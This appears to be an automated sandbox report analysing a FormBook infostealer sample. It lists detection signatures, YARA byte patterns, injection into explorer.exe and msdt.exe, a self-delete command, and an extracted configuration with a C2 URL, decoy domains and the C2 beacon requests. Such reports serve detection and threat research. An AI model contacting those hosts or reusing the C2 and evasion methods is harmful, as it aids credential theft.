Loading ...

Play interactive tourEdit tour

Windows Analysis Report PI L032452021xxls.exe

Overview

General Information

Sample Name:PI L032452021xxls.exe
Analysis ID:483590
MD5:73c7fda15888b3b6cc025ce3d5f83161
SHA1:78b8467853dc5bdba4dd28a8602902fcc210f67c
SHA256:69394a249833f97289151fa8334f32e0b0467ce4ecb164b0706784fb836136a6
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • PI L032452021xxls.exe (PID: 660 cmdline: 'C:\Users\user\Desktop\PI L032452021xxls.exe' MD5: 73C7FDA15888B3B6CC025CE3D5F83161)
    • PI L032452021xxls.exe (PID: 6756 cmdline: C:\Users\user\Desktop\PI L032452021xxls.exe MD5: 73C7FDA15888B3B6CC025CE3D5F83161)
    • PI L032452021xxls.exe (PID: 6780 cmdline: C:\Users\user\Desktop\PI L032452021xxls.exe MD5: 73C7FDA15888B3B6CC025CE3D5F83161)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 4456 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • msdt.exe (PID: 5316 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5436 cmdline: /c del 'C:\Users\user\Desktop\PI L032452021xxls.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.barry-associates.com/ergs/"], "decoy": ["jardineriavilanova.com", "highkeyfashionboutique.com", "willingtobuyyourhouse.com", "ysfno.com", "bjkhjzzs.com", "hexmotif.com", "intentionalerror.com", "nuu-foundfreedom.com", "catalystspeechservices.com", "blackmybail.com", "xntaobaozhibo.com", "site-sozdat.online", "45quisisanadr.com", "ipawlove.com", "yifa5188.com", "admm.email", "houseoftealbh.com", "scale-biz.com", "vdvppt.club", "loveandlight.life", "529jpmorgan.com", "pupupe.com", "asantejaratmavi.com", "stereovisionstudio.com", "anhhoangnhatle.com", "robrowerealestate.com", "accessorthopaedics.com", "vanaform.com", "hataribeauty.com", "karnez.net", "meghanariana.com", "lawboutique30.com", "sailoame.com", "waystoearnmoneyontheside.com", "alkalides.com", "finqian.com", "ic-video-editing.co.uk", "vomartdesign.xyz", "xn--icknb7d2bb8tv280bco4a.com", "containerreefer.com", "maison-connect.com", "fbtowww.com", "phoenizoo.com", "bet365l6.com", "royalglossesbss.com", "justiceforashleymoore.com", "hupubets.com", "technomarkets.info", "ahhaads.com", "vvbeautystudio.com", "ddogo2o4r.online", "ameliefantaisie.com", "signupforhuntington.com", "antibodycovid19testkit.com", "kuznecova.center", "yuxingo.com", "heseasy.site", "wilmingtondollshow.com", "196197.com", "domineaconfeitaria.com", "veryzocn.com", "regenerativesouls.com", "llamshop.com", "miami-autoparts.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.PI L032452021xxls.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.PI L032452021xxls.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.PI L032452021xxls.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        6.2.PI L032452021xxls.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.PI L032452021xxls.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 5316

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.barry-associates.com/ergs/"], "decoy": ["jardineriavilanova.com", "highkeyfashionboutique.com", "willingtobuyyourhouse.com", "ysfno.com", "bjkhjzzs.com", "hexmotif.com", "intentionalerror.com", "nuu-foundfreedom.com", "catalystspeechservices.com", "blackmybail.com", "xntaobaozhibo.com", "site-sozdat.online", "45quisisanadr.com", "ipawlove.com", "yifa5188.com", "admm.email", "houseoftealbh.com", "scale-biz.com", "vdvppt.club", "loveandlight.life", "529jpmorgan.com", "pupupe.com", "asantejaratmavi.com", "stereovisionstudio.com", "anhhoangnhatle.com", "robrowerealestate.com", "accessorthopaedics.com", "vanaform.com", "hataribeauty.com", "karnez.net", "meghanariana.com", "lawboutique30.com", "sailoame.com", "waystoearnmoneyontheside.com", "alkalides.com", "finqian.com", "ic-video-editing.co.uk", "vomartdesign.xyz", "xn--icknb7d2bb8tv280bco4a.com", "containerreefer.com", "maison-connect.com", "fbtowww.com", "phoenizoo.com", "bet365l6.com", "royalglossesbss.com", "justiceforashleymoore.com", "hupubets.com", "technomarkets.info", "ahhaads.com", "vvbeautystudio.com", "ddogo2o4r.online", "ameliefantaisie.com", "signupforhuntington.com", "antibodycovid19testkit.com", "kuznecova.center", "yuxingo.com", "heseasy.site", "wilmingtondollshow.com", "196197.com", "domineaconfeitaria.com", "veryzocn.com", "regenerativesouls.com", "llamshop.com", "miami-autoparts.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PI L032452021xxls.exeVirustotal: Detection: 20%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.PI L032452021xxls.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.PI L032452021xxls.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: www.barry-associates.com/ergs/Avira URL Cloud: Label: malware
          Source: 6.2.PI L032452021xxls.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PI L032452021xxls.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PI L032452021xxls.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: PI L032452021xxls.exe, 00000006.00000002.479958779.0000000003190000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PI L032452021xxls.exe, 00000006.00000002.477252553.000000000123F000.00000040.00000001.sdmp, msdt.exe, 00000011.00000002.628655231.0000000005090000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PI L032452021xxls.exe, 00000006.00000002.477252553.000000000123F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: PI L032452021xxls.exe, 00000006.00000002.479958779.0000000003190000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.karnez.net
          Source: C:\Windows\explorer.exeDomain query: www.vdvppt.club
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.barry-associates.com/ergs/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /ergs/?rt=jBPLMP3h1LcdC&J8uTkT=JWbjbWIzi5Xd8qR/4tQdqrKkFdlvhz2KwPZGVEcCMD5MfsK3CM+df9zTKLP63o3kNg3XOCoErQ== HTTP/1.1Host: www.vdvppt.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ergs/?J8uTkT=c9bkYQKJ+lNI6VVZ5eI1zueoz+82ajOViy0Ll3ZdIgo7PyasuomRPuIVCCVSa7haztcFmZ8CSw==&rt=jBPLMP3h1LcdC HTTP/1.1Host: www.karnez.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: PI L032452021xxls.exe, 00000000.00000003.361054370.000000000587D000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
          Source: explorer.exe, 00000007.00000000.429962276.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: PI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmp, PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: PI L032452021xxls.exe, 00000000.00000003.362716752.00000000058AE000.00000004.00000001.sdmp, PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: PI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: PI L032452021xxls.exe, 00000000.00000002.391202739.0000000005870000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comIr
          Source: PI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comT.TTFlr9=e
          Source: PI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
          Source: PI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed?rl=
          Source: PI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessedIr
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: PI L032452021xxls.exe, 00000000.00000003.357574592.0000000005876000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.c
          Source: PI L032452021xxls.exe, 00000000.00000003.357173176.000000000587B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: PI L032452021xxls.exe, 00000000.00000003.358089167.000000000587F000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn-
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: PI L032452021xxls.exe, 00000000.00000003.358089167.000000000587F000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna
          Source: PI L032452021xxls.exe, 00000000.00000003.357173176.000000000587B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnd.
          Source: PI L032452021xxls.exe, 00000000.00000003.365423437.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: PI L032452021xxls.exe, 00000000.00000003.365423437.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmB
          Source: PI L032452021xxls.exe, 00000000.00000003.365423437.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmjf
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: PI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/&rg=
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-r~=
          Source: PI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//nn~r/=e
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/0r
          Source: PI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Br
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Ian
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Ir
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Sue
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Webd
          Source: PI L032452021xxls.exe, 00000000.00000003.358957608.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-d-r~=
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/aniewr
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/b
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/er&=p
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ers
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmp, PI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: PI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/-r~=
          Source: PI L032452021xxls.exe, 00000000.00000003.360084029.0000000005875000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/0r
          Source: PI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Ir
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/lr9=e
          Source: PI L032452021xxls.exe, 00000000.00000003.359207902.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/lr9=e
          Source: PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/roso
          Source: PI L032452021xxls.exe, 00000000.00000003.359082297.0000000005874000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
          Source: PI L032452021xxls.exe, 00000000.00000003.365187933.0000000005877000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.W
          Source: PI L032452021xxls.exe, 00000000.00000003.355005880.00000000058AD000.00000004.00000001.sdmp, PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: PI L032452021xxls.exe, 00000000.00000003.355005880.00000000058AD000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com.
          Source: PI L032452021xxls.exe, 00000000.00000003.355005880.00000000058AD000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coms
          Source: PI L032452021xxls.exe, 00000000.00000003.355005880.00000000058AD000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comt-i
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: PI L032452021xxls.exe, 00000000.00000003.360580691.0000000005876000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comc
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: PI L032452021xxls.exe, 00000000.00000003.358246478.0000000005877000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn5
          Source: PI L032452021xxls.exe, 00000000.00000003.358246478.0000000005877000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
          Source: unknownDNS traffic detected: queries for: www.vdvppt.club
          Source: global trafficHTTP traffic detected: GET /ergs/?rt=jBPLMP3h1LcdC&J8uTkT=JWbjbWIzi5Xd8qR/4tQdqrKkFdlvhz2KwPZGVEcCMD5MfsK3CM+df9zTKLP63o3kNg3XOCoErQ== HTTP/1.1Host: www.vdvppt.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ergs/?J8uTkT=c9bkYQKJ+lNI6VVZ5eI1zueoz+82ajOViy0Ll3ZdIgo7PyasuomRPuIVCCVSa7haztcFmZ8CSw==&rt=jBPLMP3h1LcdC HTTP/1.1Host: www.karnez.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.PI L032452021xxls.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.PI L032452021xxls.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
